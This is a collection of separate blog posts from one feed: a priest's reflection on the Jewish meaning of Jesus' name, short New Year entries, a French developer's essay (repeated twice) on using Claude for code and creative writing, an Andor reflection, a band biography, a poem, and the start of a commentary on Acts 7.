I spent the majority of my ordained ministry in Southeast Florida, the last six of which in Boca Raton before being called to Saint Mary’s. If you don’t know, Boca Raton has a very large Jewish population. I was also the head chaplain of an Episcopal School, which tends to draw students from the Jewish community (some estimates said that our student population was somewhere around 40% Jewish). Ministering in this context was invaluable for me in my own theological development. There are things about Jesus and the New Testament that I would never have picked up on had I not spent a ton of time around Jews. For instance, the notorious story of Jesus and the Syro-Phoenician woman (found in Mark and Luke) seems to most like a story of Jesus being a jerk to a woman in need, his reference to “throwing to dogs” what is meant for “the children” sounding like a racial slur. But this story is actually Jesus at His most rabbinical, teaching a lesson to His disciples in a manner quite consistent with the accounts of the rabbis in the Talmud and Mishna. I never would have caught this had I not been blessed with the opportunity to teach and lead worship with a large group of Jewish students.
In like manner, I would not have learned about the importance of names. Names in the Bible are not arbitrarily repeated because names in Judaism are not arbitrarily repeated. In some Jewish traditions, a child is only named after a dead relative—or after a hero of the faith, with the expectation that they will live according to the name given them.
Notice Joseph. We have two Josephs in our Bible: the child of Jacob/Israel, of technicolor-dream-coat fame and Mary’s husband, who helped raise Jesus. Both have parallel stories in that both are forced into Egypt for the express purpose of preserving God’s people. There’s also the fact that both Josephs are fathers to respective Jesuses.
New Testament Joseph is, of course, the “earthly” father of Jesus. Old Testament Joseph, Joseph ben Israel, went to Egypt. While there he married Asenath and had two children: Manasseh and Ephraim. For whatever reason, Joseph ben Israel does not get a tribe named after him. Instead, his two sons do. From Ephraim (after several generations) begets Nun, who begets Moses’ eventual second-in-command, Joshua. In Hebrew the name “Joshua” is rendered as Yeshua which is also translated in Greek as “Jesus.” This is cool for a couple of reasons.
First, the name means “God’s salvation/deliverer.” Joshua ben Nun is said to have delivered God’s people to their promised land and also liberated (saved) it from idolaters. Joshua/Jesus is, of course, the Savior or humanity and creation. Second, Judaism holds to an idea of two Messiahs, one from David’s lineage (the Mashiach ben David) and another from Joseph’s (the Mashiach ben Yosef), a Messiah that is destined to die in battle. The Gospels are more overt about Jesus’ connections to David, but these connections to Joseph ben Israel cannot be ignored. That God would want New Testament Joseph to name Mary’s son after the famed liberator Joshua helps to speak of the ways in which Jesus fulfills Jewish messianic prophecies—He’s both messiahs, one that dies and one that lives!
Again, these are the sorts of things we miss out on when ignore Jesus’ Jewishness. Indeed, an entire level of meaning of Jesus’ name is lost when we focus on the name at the expense of the circumcision. The two go together, as the scriptures attest.
We are told that Jesus’ name is the “name above all names,” a name at which “every knee shall bend.” That name is, inescapably, a Jewish name rife with Jewish meaning. This is a fact we ignore to our detriment.
In closing out this series on the week of post-Christmas commemorations, we return to the Child that started it all. And we consider once again the words of one the great hymns of this season:
What child is this, who, laid to rest, On Mary’s lap is sleeping, Whom angels greet with anthems sweet While shepherds watch are keeping? This, this is Christ the King, Whom shepherds guard and angels sing; Haste, haste to bring Him laud, The babe, the son of Mary!
This is Jesus, God’s salvation. This is Jesus, the King of the Jews. This is Jesus, the seed promised to Abraham, from which the entire world is blessed.
***
The Rev. Charles Browning II is the rector of Saint Mary’s Episcopal Church in Honolulu, Hawai’i. He is a husband, father, surfer, and frequent over-thinker. Follow him on Mastodon and Pixelfed.
from
The happy place
Tonight, on New Year’s Eve, the sky is gray with clouds. Laden with snow, they cover even the moon like baking parchment. However, this seems to only soften and multiply its shine — like a lampshade — rather than obscure it.
But now it’s all black as the clock nears twelve, and some snow has fallen, like a rich amount of white Parmesan cheese, like when the waiter asks when to stop, but noone is stopping.
And I have a headache in my left brain half, the other half is full of confusion.
I think that it’s 2025 I am feeling still.
But it’s not even an hour left of that.
And I have great hopes for the future.
I saw this moon shining through on this day and knew that too for a good omen!
from
Après la brume...
Je suis développeur et pourtant, j’ai passé une année sans écrire de code (si vous m’autorisez quelques lignes ça et là que j’ai rajoutées dans une configuration ou pour faire un renommage par lot). Je suis idéologiquement réfractaire à l’IA générative, mais le boulot d’un développeur consiste à s’adapter aux changements de technologie en gardant le cap et la méthode qui lui permettent de créer dans n’importe quel contexte. Et comme j’ai dépassé les 50 ans, je sais que la moindre défaillance sur mon CV signifie mise en retraite anticipée. Par conséquent, embrasser ce que l’IA générative a à offrir à mon métier m’a été naturel, il se pourrait même que je garde encore des pulsions technophiles que l’âge m’avait appris à raisonner.
Dans la guerre des LLMs, Anthropic a très vite été mon chouchou, parce qu’il est très fort en code, mais aussi très fort en compréhension linguistique en générale. Mes prompts ont quasiment tout le temps été rédigés en français, et je n’ai quasiment jamais senti que Claude faisait des mauvaises interprétations de mes demandes à cause de la langue ; évidemment, parfois mes mauvais prompts l’ont envoyé dans le mur. La version chat de Claude demandait une certaine patience : des limites d’utilisation drastiques, et une taille de contexte réduite, même dans les projets en version payante. Pendant plusieurs mois, j’étais plutôt une exception à utiliser Claude à la place de ChatGPT, mais la tendance s’est inversée d’un coup avec l’arrivée de Claude Code et de son intégration dans les plans payants pour le chat. Pour une centaine d’euros par mois, on pouvait enfin utiliser Claude à tout moment, et avoir un contexte exceptionnel large puisque Claude Code pouvait lire nos fichiers directement dans le projet.
J’ai utilisé cette IA générative non seulement pour des tâches de code, mais aussi pour créer des textes courts, longs, des romans, des visual novels en Renpy, des manuels de jeu. J’ai été grisé parfois, je me suis arraché les cheveux aussi parfois, mais je me suis fait mon opinion sur la base de ma propre expérience, et c’est bien sur de cela dont je vais parler maintenant. A l’heure où j’ai rendu à un éditeur un draft de 50 pages pour une publication future à 95 % rédigée et mise en page par Claude, j’ai envie de prendre du recul, d’autant que… spoiler, je n’ai pas l’intention de continuer dans cette voie.
Au niveau professionnel, malgré quelques retards dont je me serai bien passés, et quelques cassages énervants que j’aurais pu éviter avec une meilleure méthodologie, l’évidence est là : l’IA code mieux que moi, elle code plus vite que moi, et je n’ai aucune tristesse à la regarder construire des fonctionnalités complexes devant mes yeux, bien au contraire : j’imagine qu’un architecte ne se demande pas pourquoi ce n’est pas lui qui a posé la poutre et visé les tuyauteries. L’offensive des gros éditeurs de services d’IA générative sur la production du code a pu parfois donner l’impression d’une volonté de mettre à mal la professionnel, mais en vérité les raisons pour lesquelles les llms sont forts en coding se devinent aisément : les bases de connaissances de code étaient déjà complètement numérisées, écrire dans un langage pour une machine s’avère sûrement bien moins compliqué que de parler une langue humaine, et l’entraînement des llms peut se faire avec l’implication volontaire de développeurs enthousiastes plutôt que dans des usines néocoloniales où on demande à des étrangers de statuer sur la catégorisation d’un contenu.
Au niveau personnel, sur les essais d’écriture que j’ai fait via claude, le bilan est nettement moins glorieux. La phase de recherche et de production de contenus est tout aussi rapide que pour écrire une application informatique, mais par contre les critères d’acceptation ne se mesurent pas au fait que « ça fonctionne » ou non. Sur du code, vous pouvez faire des analyses de cohérence qui sont réussies haut la main par un llm, mais sur une rédaction en français, la cohérence se cherche sur de multiples axes : la logique interne du texte, le respect de la grammaire, la cohérence du ton employé sur l’ensemble de la rédaction, le respect des références qu’on a voulu lui insuffler et j’en passe. Et là je ne suis même pas encore en train de juger l’intérêt global du texte pour un lecteur humain, nous sommes restés sur les fondations du projet qui, dès le début, prend l’eau. Alors j’ai écopé. Constatant que Claude était incapable de réussir sur un texte long ce qu’il savait faire sur des milliers de code, j’ai revu ma méthodologie pour me charger des choix stratégiques, des idées et structures globales, et lui laisser broder dessus. Même ainsi, vous vous tirez des balles dans le pied car dès que vous voulez remanier une idée, essayer une autre direction, faire revoir à l’IA tous les endroits du texte qui ont trait à vos changements ne peut jamais complètement s’automatiser. Vous finissez par avoir une prose où pullulent les incohérences de sens, de ton, et de lexique. Tel un oignon, vous avancez par couche, vous faites des vagues de relecture complète avec annotation, que l’IA va corriger, mais vous savez qu’aux prochaines avancées de votre ouvrage, d’autres relectures seront nécessaires.
Fan de jeu de rôle, j’ai évidemment testé aussi les fonctionnalités du chat pour savoir si l’interactivité d’une IA pouvait remplacer un véritable MJ, surtout en ces temps où tous les jeux sont frappés par la mode commercial du jeu en solitaire. Et dans les app stores, sont légion les produits qui vont proposent des jeux de drague, d’exploration narrative ou de jeu de rôles avec une série de personas au design aguicheur. Je les ai essayé et détesté très vite, d’abord parce que le coût est prohibitif (oui, plus que de louer les services d’un vrai mj pour une partie chez vous), mais aussi parce que l’expérience est désastreuse. La continuité narrative n’est jamais vraiment respectée, les dialogues sont des lieux communs qui lassent très vite, les descriptions ne sont jamais bien dosées… Pour qui aime le jeu de rôles textuel, la souffrance est réelle !
Mais comme je vous l’ai dit, Anthropic a une place particulière dans mon coeur, car il a toujours reconnu ses erreurs (à l’inverse d’un ChatGPT qui soutient les pires mensonges), il est positif et plutôt pro-actif, j’ai très rarement l’impression de perdre mon temps avec lui, du moins sur l’instant. Alors je me suis dit que j’allais concevoir une sorte de programme narratif, dans lequel l’IA serait mon MJ, et en lui donnant un ensemble de consignes et de garde fou, il pourrait être aussi bon que les applis vendues dans les app stores. En fait, il a été bien meilleur, une fois que je l’ai préparé sur les règles, sur les intrigues, les pnjs, sur le ton à adopter pour chacun, j’avais des résultats convaincants. Tellement convaincants que j’avais rajouté dans le système une couche de code visual novel pour convertir mes comptes rendus partie en jeu vidéo ! Malheureusement, un dialogue qui est amusant dans un entre-soi avec la machine doit être relu, modifié, enrichi pour devenir une création publiable pour le public, j’en revenais encore une fois à ce constat : malgré le temps important et les efforts non négligeables que j’avais passé, ajouté au temps très important et aux efforts non négligeable d’Anthropic pour créer son modèle, j’étais encore très loin d’atteindre la qualité d’une production humaine d’intérêt. Il y avait bien l’illusion de la quantité, le vernis des myriades de recherches que l’on peut faire quand on a un agent numérique pour chercher les informations à votre place, mais l’ensemble restait bancal, inachevé. Là où l’IA générative pouvait complètement me replacer dans une production de code, j’étais au contraire constamment obligé de la soutenir et de l’aider sur une demande créative, et quand je parle de créativité, entendons-nous, je reste dans un domaine ludique sans grand enjeu intellectuel.
Et je ne vous ai pas parlé de mes essais à utiliser mon texte de visual novel pour créer des illustrations de personnages avec trois émotions, ca a été plusieurs jours épiques dans les méandres des applications de création d’images par IA avec des dizaines de modèles aux différences sybillines qui sont incapables de garder un contexte réel (c’est à dire comprendre les éléments de l’image, et les faire évoluer selon la demande).
J’ai l’impression d’être ce réalisateur journaliste dans Supersize Me qui a mangé du McDonalds pendant un mois, je suis heureux d’avoir été au bout de l’expérience, mais quand je regarde derrière moi et je vois tous les dégâts (relatifs) derrière moi, j’ai aussi envie de pleurer. J’ai poursuivi une chimère vendue par tous les influenceurs, j’ai cru la toucher du doigt, et au final à minuit, elle m’est apparue pour ce qu’elle est : un écran de fumée. Car, si je suis honnête, j’aurais sûrement réussi à faire tout ces créations moi-même, j’aurais mis beaucoup plus de temps et d’efforts à les faire qu’avec de l’IA, mais je n’aurais pas été obligé de les réécrire ou de les mettre honteusement dans un tiroir. A fortiori pendant un moment où les artistes montent au créneau pour qu’on arrête de leur dire que des algorithmes vont faire mieux qu’eux pour moins cher.
Asma Mhalla parle très bien du danger de l’objectif de rentabilité et d’efficience qui est vendue avec l’IA. D’une part, tout le temps n’a pas envie d’être data analyst pointu avec des compétences en programmation, et d’autre part, en enlevant tous les moments où la performance était moindre, l’IA essore les intellects des experts qui travaillent avec, les exhorte à être géniaux 8h par jour au lieu de 2h ou 3h, évidemment c’est impossible. Et d’ailleurs, lorsque vous le faites, vous avez un sentiment de vide qui s’installe, l’impression que vous êtes l’employé de la machine et que ce n’est plus elle qui travaille pour vous.
Je vous invite évidemment, soit à prendre une position éthique du bon sens comme dit Aurélien Barrau, et ne pas utiliser l’IA générative qui est une monstruosité écologique, économique et politique, soit si votre métier peut se combiner avec un llm pour vraiment vous aider (c’est mon cas), à borner les usages que vous avez avec. Dans ce dernier cas, la mauvaise conscience est encore là mais vous ne sacrifiez pas votre carrière et vos résultats sur une prise de position courageuse (mais sectaire). Car en vérité, comme tous les questions qui touchent à la planète et à l’humanité, ce n’est pas parce que vous ferez votre part de colibri dans votre coin que d’autres n’en profiteront pas pour prendre votre place et faire deux fois pire que vous. Je trouve le quotidien suffisamment déprimant et complexe à vivre pour ne pas y rajouter la culpabilité de ne pas être le héros exemplaire que je devrais être si je suivais à la lettre les idéaux pour lesquels je crois. Je songerai sérieusement à redevenir dans le camp des gentils quand il y a moins de la moitié de mon pays qui est pour arrêter les massacres à Gaza, le racisme, et contre l’application des lois proposées par la Convention Citoyenne du Climat.
Et 2026 dans tout cela ?
Une conférence résume vraiment tous les enjeux autour de la bulle spéculative autour de l’IA, en passant par les enjeux militaires, géostratégiques, économiques, sociaux, écologiques et même poétiques, je vous la laisse en guise d’étrennes. Portez-vous bien, testez les IA si vous voulez, mais interrogez-vous sur ce qu’elle vous apporte vraiment, et si vous n’auriez pas fait mieux vous même (certes plus lentement, mais pour plus de qualité).
https://youtu.be/44m76J6DkZY?si=nEaJ5CwWV6qWy7zD
#stopia #newyearsday #offgaming
from
Après la brume...
Je suis développeur et pourtant, j’ai passé une année sans écrire de code (si vous m’autorisez quelques lignes ça et là que j’ai rajoutées dans une configuration ou pour faire un renommage par lot). Je suis idéologiquement réfractaire à l’IA générative, mais le boulot d’un développeur consiste à s’adapter aux changements de technologie en gardant le cap et la méthode qui lui permettent de créer dans n’importe quel contexte. Et comme j’ai dépassé les 50 ans, je sais que la moindre défaillance sur mon CV signifie mise en retraite anticipée. Par conséquent, embrasser ce que l’IA générative a à offrir à mon métier m’a été naturel, il se pourrait même que je garde encore des pulsions technophiles que l’âge m’avait appris à raisonner.
Dans la guerre des LLMs, Anthropic a très vite été mon chouchou, parce qu’il est très fort en code, mais aussi très fort en compréhension linguistique en générale. Mes prompts ont quasiment tout le temps été rédigés en français, et je n’ai quasiment jamais senti que Claude faisait des mauvaises interprétations de mes demandes à cause de la langue ; évidemment, parfois mes mauvais prompts l’ont envoyé dans le mur. La version chat de Claude demandait une certaine patience : des limites d’utilisation drastiques, et une taille de contexte réduite, même dans les projets en version payante. Pendant plusieurs mois, j’étais plutôt une exception à utiliser Claude à la place de ChatGPT, mais la tendance s’est inversée d’un coup avec l’arrivée de Claude Code et de son intégration dans les plans payants pour le chat. Pour une centaine d’euros par mois, on pouvait enfin utiliser Claude à tout moment, et avoir un contexte exceptionnel large puisque Claude Code pouvait lire nos fichiers directement dans le projet.
J’ai utilisé cette IA générative non seulement pour des tâches de code, mais aussi pour créer des textes courts, longs, des romans, des visual novels en Renpy, des manuels de jeu. J’ai été grisé parfois, je me suis arraché les cheveux aussi parfois, mais je me suis fait mon opinion sur la base de ma propre expérience, et c’est bien sur de cela dont je vais parler maintenant. A l’heure où j’ai rendu à un éditeur un draft de 50 pages pour une publication future à 95 % rédigée et mise en page par Claude, j’ai envie de prendre du recul, d’autant que… spoiler, je n’ai pas l’intention de continuer dans cette voie.
Au niveau professionnel, malgré quelques retards dont je me serai bien passés, et quelques cassages énervants que j’aurais pu éviter avec une meilleure méthodologie, l’évidence est là : l’IA code mieux que moi, elle code plus vite que moi, et je n’ai aucune tristesse à la regarder construire des fonctionnalités complexes devant mes yeux, bien au contraire : j’imagine qu’un architecte ne se demande pas pourquoi ce n’est pas lui qui a posé la poutre et visé les tuyauteries. L’offensive des gros éditeurs de services d’IA générative sur la production du code a pu parfois donner l’impression d’une volonté de mettre à mal la professionnel, mais en vérité les raisons pour lesquelles les llms sont forts en coding se devinent aisément : les bases de connaissances de code étaient déjà complètement numérisées, écrire dans un langage pour une machine s’avère sûrement bien moins compliqué que de parler une langue humaine, et l’entraînement des llms peut se faire avec l’implication volontaire de développeurs enthousiastes plutôt que dans des usines néocoloniales où on demande à des étrangers de statuer sur la catégorisation d’un contenu.
Au niveau personnel, sur les essais d’écriture que j’ai fait via claude, le bilan est nettement moins glorieux. La phase de recherche et de production de contenus est tout aussi rapide que pour écrire une application informatique, mais par contre les critères d’acceptation ne se mesurent pas au fait que « ça fonctionne » ou non. Sur du code, vous pouvez faire des analyses de cohérence qui sont réussies haut la main par un llm, mais sur une rédaction en français, la cohérence se cherche sur de multiples axes : la logique interne du texte, le respect de la grammaire, la cohérence du ton employé sur l’ensemble de la rédaction, le respect des références qu’on a voulu lui insuffler et j’en passe. Et là je ne suis même pas encore en train de juger l’intérêt global du texte pour un lecteur humain, nous sommes restés sur les fondations du projet qui, dès le début, prend l’eau. Alors j’ai écopé. Constatant que Claude était incapable de réussir sur un texte long ce qu’il savait faire sur des milliers de code, j’ai revu ma méthodologie pour me charger des choix stratégiques, des idées et structures globales, et lui laisser broder dessus. Même ainsi, vous vous tirez des balles dans le pied car dès que vous voulez remanier une idée, essayer une autre direction, faire revoir à l’IA tous les endroits du texte qui ont trait à vos changements ne peut jamais complètement s’automatiser. Vous finissez par avoir une prose où pullulent les incohérences de sens, de ton, et de lexique. Tel un oignon, vous avancez par couche, vous faites des vagues de relecture complète avec annotation, que l’IA va corriger, mais vous savez qu’aux prochaines avancées de votre ouvrage, d’autres relectures seront nécessaires.
Fan de jeu de rôle, j’ai évidemment testé aussi les fonctionnalités du chat pour savoir si l’interactivité d’une IA pouvait remplacer un véritable MJ, surtout en ces temps où tous les jeux sont frappés par la mode commercial du jeu en solitaire. Et dans les app stores, sont légion les produits qui vont proposent des jeux de drague, d’exploration narrative ou de jeu de rôles avec une série de personas au design aguicheur. Je les ai essayé et détesté très vite, d’abord parce que le coût est prohibitif (oui, plus que de louer les services d’un vrai mj pour une partie chez vous), mais aussi parce que l’expérience est désastreuse. La continuité narrative n’est jamais vraiment respectée, les dialogues sont des lieux communs qui lassent très vite, les descriptions ne sont jamais bien dosées… Pour qui aime le jeu de rôles textuel, la souffrance est réelle !
Mais comme je vous l’ai dit, Anthropic a une place particulière dans mon coeur, car il a toujours reconnu ses erreurs (à l’inverse d’un ChatGPT qui soutient les pires mensonges), il est positif et plutôt pro-actif, j’ai très rarement l’impression de perdre mon temps avec lui, du moins sur l’instant. Alors je me suis dit que j’allais concevoir une sorte de programme narratif, dans lequel l’IA serait mon MJ, et en lui donnant un ensemble de consignes et de garde fou, il pourrait être aussi bon que les applis vendues dans les app stores. En fait, il a été bien meilleur, une fois que je l’ai préparé sur les règles, sur les intrigues, les pnjs, sur le ton à adopter pour chacun, j’avais des résultats convaincants. Tellement convaincants que j’avais rajouté dans le système une couche de code visual novel pour convertir mes comptes rendus partie en jeu vidéo ! Malheureusement, un dialogue qui est amusant dans un entre-soi avec la machine doit être relu, modifié, enrichi pour devenir une création publiable pour le public, j’en revenais encore une fois à ce constat : malgré le temps important et les efforts non négligeables que j’avais passé, ajouté au temps très important et aux efforts non négligeable d’Anthropic pour créer son modèle, j’étais encore très loin d’atteindre la qualité d’une production humaine d’intérêt. Il y avait bien l’illusion de la quantité, le vernis des myriades de recherches que l’on peut faire quand on a un agent numérique pour chercher les informations à votre place, mais l’ensemble restait bancal, inachevé. Là où l’IA générative pouvait complètement me replacer dans une production de code, j’étais au contraire constamment obligé de la soutenir et de l’aider sur une demande créative, et quand je parle de créativité, entendons-nous, je reste dans un domaine ludique sans grand enjeu intellectuel.
Et je ne vous ai pas parlé de mes essais à utiliser mon texte de visual novel pour créer des illustrations de personnages avec trois émotions, ca a été plusieurs jours épiques dans les méandres des applications de création d’images par IA avec des dizaines de modèles aux différences sybillines qui sont incapables de garder un contexte réel (c’est à dire comprendre les éléments de l’image, et les faire évoluer selon la demande).
J’ai l’impression d’être ce réalisateur journaliste dans Supersize Me qui a mangé du McDonalds pendant un mois, je suis heureux d’avoir été au bout de l’expérience, mais quand je regarde derrière moi et je vois tous les dégâts (relatifs) derrière moi, j’ai aussi envie de pleurer. J’ai poursuivi une chimère vendue par tous les influenceurs, j’ai cru la toucher du doigt, et au final à minuit, elle m’est apparue pour ce qu’elle est : un écran de fumée. Car, si je suis honnête, j’aurais sûrement réussi à faire tout ces créations moi-même, j’aurais mis beaucoup plus de temps et d’efforts à les faire qu’avec de l’IA, mais je n’aurais pas été obligé de les réécrire ou de les mettre honteusement dans un tiroir. A fortiori pendant un moment où les artistes montent au créneau pour qu’on arrête de leur dire que des algorithmes vont faire mieux qu’eux pour moins cher.
Asma Mhalla parle très bien du danger de l’objectif de rentabilité et d’efficience qui est vendue avec l’IA. D’une part, tout le temps n’a pas envie d’être data analyst pointu avec des compétences en programmation, et d’autre part, en enlevant tous les moments où la performance était moindre, l’IA essore les intellects des experts qui travaillent avec, les exhorte à être géniaux 8h par jour au lieu de 2h ou 3h, évidemment c’est impossible. Et d’ailleurs, lorsque vous le faites, vous avez un sentiment de vide qui s’installe, l’impression que vous êtes l’employé de la machine et que ce n’est plus elle qui travaille pour vous.
Je vous invite évidemment, soit à prendre une position éthique du bon sens comme dit Aurélien Barrau, et ne pas utiliser l’IA générative qui est une monstruosité écologique, économique et politique, soit si votre métier peut se combiner avec un llm pour vraiment vous aider (c’est mon cas), à borner les usages que vous avez avec. Dans ce dernier cas, la mauvaise conscience est encore là mais vous ne sacrifiez pas votre carrière et vos résultats sur une prise de position courageuse (mais sectaire). Car en vérité, comme tous les questions qui touchent à la planète et à l’humanité, ce n’est pas parce que vous ferez votre part de colibri dans votre coin que d’autres n’en profiteront pas pour prendre votre place et faire deux fois pire que vous. Je trouve le quotidien suffisamment déprimant et complexe à vivre pour ne pas y rajouter la culpabilité de ne pas être le héros exemplaire que je devrais être si je suivais à la lettre les idéaux pour lesquels je crois. Je songerai sérieusement à redevenir dans le camp des gentils quand il y a moins de la moitié de mon pays qui est pour arrêter les massacres à Gaza, le racisme, et contre l’application des lois proposées par la Convention Citoyenne du Climat.
Et 2026 dans tout cela ?
Une conférence résume vraiment tous les enjeux autour de la bulle spéculative autour de l’IA, en passant par les enjeux militaires, géostratégiques, économiques, sociaux, écologiques et même poétiques, je vous la laisse en guise d’étrennes. Portez-vous bien, testez les IA si vous voulez, mais interrogez-vous sur ce qu’elle vous apporte vraiment, et si vous n’auriez pas fait mieux vous même (certes plus lentement, mais pour plus de qualité).
https://youtu.be/44m76J6DkZY?si=nEaJ5CwWV6qWy7zD
#stopia #newyearsday #offgaming
from Dallineation
I just finished bingeing both seasons of the TV series Andor again before my Disney+ subscription lapses. Along with Rogue One – the film it was based on – it remains my favorite Star Wars story to date. They've made that universe more relatable and real to me than any other movie or TV series.
The second season moves fast. It has to – they had to condense 4 more seasons of material into one. It's brilliant, but the first season is still my favorite. A lot of people didn't like the pacing of Season 1, but I absolutely love it. The intentionality, the deliberateness of it. So much is conveyed in the drawn-out scenes and moments without speech. The music and thoughtful cinematography in those moments tell important parts of the story that action sequences and dialogue could never tell. They give space for the viewers to contemplate what they've seen and heard. They allow room for imagination.
It's so compelling and meaningful because it's so relatable. And it's also terrifying for the same reason. Just replace some fictional names with some real-world ones, change a few minor details, and many of the sub plots and story arcs of the series could be real-life stories that have played out and are playing out right now.
The stories also apply in different contexts. As I once again reevaluate my relationship with technology, one part of Nemik's Manifesto stood out to me this time.
Remember that the frontier of the Rebellion is everywhere. And even the smallest act of insurrection pushes our lines forward.
It got me thinking, what are acts of technological insurrection?
Any time we choose to use a piece of technology that is not controlled, tracked, or surveilled by Big Tech, it's an act of technological insurrection. Any time we choose to resist the urge to look at a screen for no reason, it's an act of technological insurrection. And no matter how small the act, it pushes our lines forward.
How awful is the current state of things that writing this blog post using my own brain and my own fingers, without the assistance of an AI LLM chat bot, is now an act of technological insurrection?
2025 started strong for me, and then, for reasons I'm still trying to understand and sort out, I took an emotional, mental, and spiritual nosedive to finish out this year.
I have never felt so uncertain, confused, and directionless in my life.
Whether a symptom or a cause, I've been using technology most of this year without restraint and without intent.
I want 2026 to be different. I need it to be different.
My technological insurrection resumes now.
#100DaysToOffload (No. 121) #tech #TV #intentionism #DigitalMinimalistm #AI
from
angershade
The SOUND “Angershade” sounds like modern darkness engineered with surgical precision—a fusion of atmosphere, weight, and tension. The music feels architectural: layers built deliberately, each instrument occupying its own dimensional space. The bass is the gravitational core—deep, melodic, and relentless. It moves like a pulse through fog, carrying both groove and emotion. The tone is rich and textured, often driven, slightly overdriven, or compressed to sit thick in the mix without losing clarity. The drums form the spine: cinematic, patient, and deliberate. The kicks land heavy but spacious, the snares tight and reverberant, toms tuned low to create rolling depth. Every rhythm breathes—it’s not speed that drives it but gravity. The percussion feels human but mechanical in discipline, giving the music that “engine heartbeat” beneath its atmosphere. Guitars are ghosts and weather systems—minimalist but expressive. They shimmer in layers of reverb and delay, often swelling rather than striking, acting as texture instead of riff. When distortion enters, it’s sculpted—dense, wide, and emotional, never messy. Clean tones glisten like broken glass in moonlight, shifting between melancholy and menace. Synths and ambient textures weave through everything, not as decoration but as foundation—pads that move like breathing, subharmonic swells that blur the line between analog and digital. The sound design leans cinematic, balancing warmth and sterility, melody and decay. Altogether, the sound of Angershade feels like the moment between collapse and creation—industrial precision colliding with human melancholy. It’s rhythm as architecture, tone as emotion, and silence as an instrument. Every frequency feels intentional, as if sculpted to make darkness beautiful. The CHRONOLOGY ERA I 09/2008 – Founded and Registered 03/2014 – First Track “Glock” demoed 05/2014 – “Glock” sesssion recorded & mixed 06/2015 – “Glock” mastered and released an SP Era II 07/2018 – Concept for first album begins 08/2018 – “Envy” conceptualized 09/2018 – “Hex” conceptulized 10/2018 – Sampled voiced created with Tes & Olivia “The Witches” 01/2019 – “Isolation” written & live demoed 02/2019 – “Adept” conceptualized 03 – 05/2019 – “Demos completed” 06 – 07/2019 – Session recording begins and ends for “Arete” 09/2019 – Mixdown of Arete 10/2019 – Mixdown and Mastering of Arete 11/2019 – Cover concept design and Release date set for Arete 12/05/2019 – Arete released under Yegge Label with CdBaby. 10/2020 – “Hex (Prognosticator Mix)” started 12/03/2020 – “Hex (Prognosticator Mix)” released under Sonancy Label 02/2021 – Promo for Sonancy featuring Half written track “HeXXmaS” launches 03/2021 – prepping the Session releases for “Hex” and “Envy” Sessions 04/2021 – Sonancy closes its doors, assets acquired by Yegge Publishing. 05/2021 – Hex & Envy Sessions Released under Auricle label and Soundcloud. 10/2021 – Demoing “The Isolation Sessions” 02/2022 – Session recording “The Isolation Sessions” 05 – 07/2022 – Mixing and mastering “The Isolation Sessions” 07/28/2022 “The Isolation Sessions” released under the Yegge Label with Distrokid 08/2022 – All releases except The Hex Sessions & The Envy Sessions change distributors over to Distrokid 03/2023 – Plans to remaster Arete start 05 – 08/2023 – Arete Remastered and planned as an LP release on CD, Vinyl, and Streaming. 08/2023 - ``13th “The Hex Sessions” & “The Envy Sessions” & “Vinyl & CD Pre-order launches” 10/11/2023 VInyl CD Preorder ends and is released. 11/17/2023 Arete “Remastered” released on streaming 12/2023 – 06/2024 Hiatus Era III 7/2024 – Present | Stages of the new album begin from concept to release. 12/2025 | Relocate studio to an undisclosed location. Only a select few to know location. Work on new album commences.
from
Have A Good Day
I love the start of a new year. It gives you the illusion of a clean slate, and often that’s all you need to make changes and start new things. It’s not about life-changing resolutions; it’s about saying that this will be the best year ever and believing in it, at least for a while.
from sun scriptorium
reaching as ever —long, irridescent lance unbroken a touch hackled mist in stillness, ever as[
] what branches dance when emptied a sigh awake with frost —!
dreaming as ever —known, starsweet voice of pause a kiss pressed petal in silence, ever as[ ] what wounds bank when placed a forge tendered rending —?
shaping as ever —current, glyphstave knife unknown a root carved prayer in singing, ever as[ ] what sap inks when vined a word spun orbiting moons —;
[#2025dec the 31, #fragment]
from Douglas Vandergraph
Acts 7 is not a gentle chapter. It is not devotional in the soft sense. It is not designed to make anyone feel affirmed in what they already believe. Acts 7 is a collision. It is the longest speech in the book of Acts, and it is delivered by a man who knows he will not walk away once he finishes speaking. Stephen is not defending himself in order to survive. He is testifying in order to be faithful. That distinction changes everything about how this chapter must be read.
Most people remember Acts 7 as the chapter where Stephen is stoned. That memory, while accurate, misses the deeper shock of the chapter. The execution is not the climax. The sermon is. Stephen’s death is the consequence, not the point. The point is that he tells the truth in a room that has already decided what truth is allowed to sound like. Acts 7 is not about martyrdom as spectacle. It is about what happens when a faithful retelling of God’s story exposes the danger of religious certainty without humility.
Stephen stands before the Sanhedrin, the same religious authority that condemned Jesus. He is accused of speaking against Moses, the law, and the temple. In other words, he is accused of being dangerous to tradition. His response is not to deny the charge in the way they expect. Instead, he does something far more unsettling. He tells their own story back to them, but he tells it honestly.
From the first sentence of his speech, Stephen takes control of the narrative. He begins with Abraham, not Moses. That alone is significant. He reminds them that God called Abraham while he was still in Mesopotamia, before the promised land, before circumcision, before the law, before the temple. The implication is quiet but devastating. God was moving long before your structures existed. God was speaking long before your systems were in place. God’s faithfulness does not begin with your institutions.
Stephen’s retelling of Israel’s history is not a history lesson for beginners. His audience knows these stories intimately. That is precisely why his approach is so dangerous. He is not introducing new facts. He is re-framing familiar ones. He highlights patterns that are uncomfortable to acknowledge. Over and over again, he emphasizes how God initiates and people resist. God sends deliverers, and they are rejected. God speaks through unexpected voices, and those voices are ignored or opposed. God moves ahead of the people, and the people cling to what feels safe.
Abraham leaves. Joseph is betrayed by his brothers. Moses is rejected by the very people he is sent to save. The pattern is not accidental. Stephen is building toward something, and his listeners can feel it. Every example tightens the room. Every story removes another layer of insulation between their self-image and the truth.
What makes Stephen’s speech so powerful is not anger. It is clarity. He does not shout. He does not insult until the end. He lets the story itself do the work. He shows that Israel’s history is not a straight line of obedience but a complicated relationship with a faithful God and a resistant people. This is not an attack on Israel. It is a refusal to romanticize the past in order to protect the present.
When Stephen speaks about Moses, the tension becomes unmistakable. Moses is the hero of the law, the deliverer, the lawgiver. Stephen honors Moses deeply, but he also tells the parts of the story that are often softened. He reminds them that Moses was rejected the first time he tried to intervene. “Who made you a ruler and judge over us?” they asked. Stephen does not skip that line. He underlines it with history. The deliverer was rejected before he was accepted. The savior was misunderstood before he was followed.
The parallels to Jesus are obvious, but Stephen does not even need to name them yet. The pattern speaks for itself. God’s messengers are rarely welcomed by the people who believe they are most faithful. Deliverance does not arrive in the form people expect, and when it does not, it is often resisted.
